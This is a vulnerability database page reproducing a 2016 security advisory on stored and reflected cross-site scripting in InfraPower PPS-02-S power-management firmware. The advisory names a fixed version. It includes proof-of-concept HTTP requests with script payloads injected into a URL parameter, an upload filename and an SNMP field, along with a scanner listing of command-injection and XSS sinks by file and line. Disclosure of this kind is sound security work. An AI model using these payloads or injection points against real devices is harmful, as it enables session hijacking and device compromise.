Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

InfraPower PPS-02-S Q213V1 Cross Site Scripting

🗓️ 30 Oct 2016 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 42 Views

InfraPower PPS-02-S Q213V1 Multiple XSS vulnerabilities in Austin Hughes Electronics Ltd. InfraPower Manager PPS-02-S. Stored and reflected XSS vulnerabilities in various scripts not properly sanitized. Exploitable to execute arbitrary HTML and script code in user's browser session

Code
`  
InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities  
  
  
Vendor: Austin Hughes Electronics Ltd.  
Product web page: http://www.austin-hughes.com  
Affected version: Q213V1 (Firmware: V2395S)  
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)  
  
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each  
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.  
Patented IP Dongle provides IP remote access to the PDUs by a true  
network IP address chain. Only 1xIP dongle allows access to max. 16  
PDUs in daisy chain - which is a highly efficient cient application  
for saving not only the IP remote accessories cost, but also the true  
IP addresses required on the PDU management.  
  
Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities  
when input passed via several parameters to several scripts is not properly  
sanitized before being returned to the user. This can be exploited to execute  
arbitrary HTML and script code in a user's browser session in context of an affected  
site.  
  
Tested on: Linux 2.6.28 (armv5tel)  
lighttpd/1.4.30-devel-1321  
PHP/5.3.9  
SQLite/3.7.10  
  
  
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5369  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php  
  
  
27.09.2016  
  
--  
  
  
#################################################################################  
  
GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1  
  
#################################################################################  
  
POST /FWUpgrade.php HTTP/1.1  
Host: 192.168.0.17  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh  
Connection: close  
  
------WebKitFormBoundary207OhXVwesC60pdh  
Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"  
Content-Type: text/php  
  
t00t  
------WebKitFormBoundary207OhXVwesC60pdh  
Content-Disposition: form-data; name="upfile"  
  
somefile.php  
------WebKitFormBoundary207OhXVwesC60pdh  
Content-Disposition: form-data; name="ID_Page"  
  
Firmware.php?Menu=FRM  
------WebKitFormBoundary207OhXVwesC60pdh--  
  
  
#################################################################################  
  
POST /SNMP.php?Menu=SMP HTTP/1.1  
Host: 192.168.0.17  
  
SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//  
  
#################################################################################  
  
  
lqwrm@zslab:~#  
lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt  
-------------------------------------------------  
PHP Source Code Security Scanner v0.2  
(c) Zero Science Lab - http://www.zeroscience.mk  
Tue Sep 27 10:35:52 CEST 2016  
-------------------------------------------------  
  
Scanning recursively...Done.  
  
dball.php:  
  
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'  
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'  
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'  
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'  
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'  
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'  
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'  
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'  
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'  
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'  
  
  
doupgrate.php:  
  
Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'  
Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'  
Line 15: Command Injection in 'system' via '$_POST'  
Line 16: Command Injection in 'system' via '$_POST'  
Line 19: Command Injection in 'system' via '$_POST'  
  
  
Firmware.php:  
  
Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'  
  
  
Function.php:  
  
Line 257: Header Injection in 'header' via '$_SERVER'  
Line 267: Header Injection in 'header' via '$_SERVER'  
  
  
FWUpgrade.php:  
  
Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'  
Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'  
Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'  
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'  
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'  
  
  
index.php:  
  
Line 2: Header Injection in 'header' via '$_SERVER'  
  
  
IPSettings.php:  
  
Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.  
Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.  
Line 117: Command Injection in 'exec' via '$IP_setting'  
Line 117: Command Injection in 'exec' via '$Netmask_setting'  
Line 123: Command Injection in 'exec' via '$Gateway_setting'  
  
  
ListFile.php:  
  
Line 12: PHP File Inclusion in 'fgets' via '$fp'  
  
  
Login.php:  
  
Line 151: Command Injection in 'shell_exec' via '$_POST'  
  
  
Ntp.php:  
  
Line 46: Command Injection in 'exec' via '$idx'  
  
  
OutletDetails.php:  
  
Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'  
Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'  
Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'  
Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'  
Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'  
Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'  
Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'  
  
  
PDUStatus.php:  
  
Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'  
  
  
production_test1.php:  
  
Line 6: Command Injection in 'shell_exec' via '$_POST'  
Line 45: Command Injection in 'proc_open' via '$_ENV'  
  
  
SensorDetails.php:  
  
Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'  
Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'  
Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'  
  
  
SensorStatus.php:  
  
Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'  
  
  
SNMP.php:  
  
Line 41: Command Injection in 'exec' via '$_POST'  
  
  
System.php:  
  
Line 54: Header Injection in 'header' via '$_SERVER'  
Line 64: Header Injection in 'header' via '$_SERVER'  
Line 99: Command Injection in 'exec' via '$datetime'  
Line 99: Command Injection in 'exec' via '$datetime'  
Line 99: Command Injection in 'exec' via '$datetime'  
Line 99: Command Injection in 'exec' via '$datetime'  
Line 99: Command Injection in 'exec' via '$datetime'  
Line 99: Command Injection in 'exec' via '$datetime'  
Line 185: Command Injection in 'exec' via '$TimeServer'  
Line 286: Command Injection in 'exec' via '$IP_setting'  
Line 286: Command Injection in 'exec' via '$Netmask_setting'  
Line 292: Command Injection in 'exec' via '$Gateway_setting'  
  
  
UploadEXE.php:  
  
Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'  
Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'  
Line 82: Command Injection in 'popen' via '$_FILES'  
Line 96: PHP File Inclusion in 'fgets' via '$fp'  
Line 96: PHP File Inclusion in 'fgets' via '$buffer'  
  
  
WriteRequest.php:  
  
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'  
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'  
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'  
  
  
-----------------------------------------------------  
Scan finished. Check results in scan_output.txt file.  
  
lqwrm@zslab:~#   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Oct 2016 00:00Current
7.4High risk
Vulners AI Score7.4
infrapowerxss vulnerabilitiesaustin hughes electronics
42